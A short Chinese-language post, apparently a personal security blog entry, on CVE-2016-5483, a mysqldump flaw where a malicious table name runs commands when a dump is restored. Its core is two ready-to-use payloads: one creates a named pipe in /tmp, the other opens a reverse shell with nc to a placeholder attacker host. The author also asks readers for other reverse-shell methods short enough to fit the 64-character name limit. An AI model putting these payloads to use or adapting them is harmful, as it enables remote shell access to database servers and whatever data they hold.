Mysql…

CVE-2016-5483

描述

mysqldump是用来创建MySQL数据库逻辑备份的一个常用工具。它在默认配置下可以生成一个.sql文件,其中包含创建/删除表和插入数据等。在导入转储文件的时候,攻击者可以通过制造恶意表名来实现任意SQL语句查询和shell命令执行的目的.

利用场景

能够执行任意的SQL查询,拥有创建表的权利,数据库定期使用mysqldump备份

测试

payload:

1
2
3
create table `
\! mknod /tmp/p p
/*` (text text);

1
2
3
create table `
\! sh 0</tmp/p 2>&1|nc attackerip port 1>/tmp/p&
/*` (text text);

结果

注:mysql数据库名、表名、列名长度限制64位.
不过有没有其它的反弹的方法,我测试的都长度会超过,就这个合适…
如果有的话,望大佬传授…
(ง •_•)ง